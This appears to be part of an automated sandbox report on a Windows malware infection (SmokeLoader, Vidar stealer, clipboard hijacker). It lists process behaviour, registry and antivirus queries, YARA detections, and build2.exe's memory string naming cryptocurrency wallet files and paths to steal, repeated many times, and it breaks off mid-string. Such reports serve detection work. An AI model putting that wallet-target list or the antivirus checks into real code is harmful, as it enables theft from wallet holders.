Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	15_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: EnumSystemLocalesW,	15_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	15_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	15_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	15_2_00437F83

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 9_2_00408E4E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

9_2_00408E4E

Source: C:\Users\user\AppData\Local\Temp\E609.exe

10_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

10_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\E609.exe

10_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local 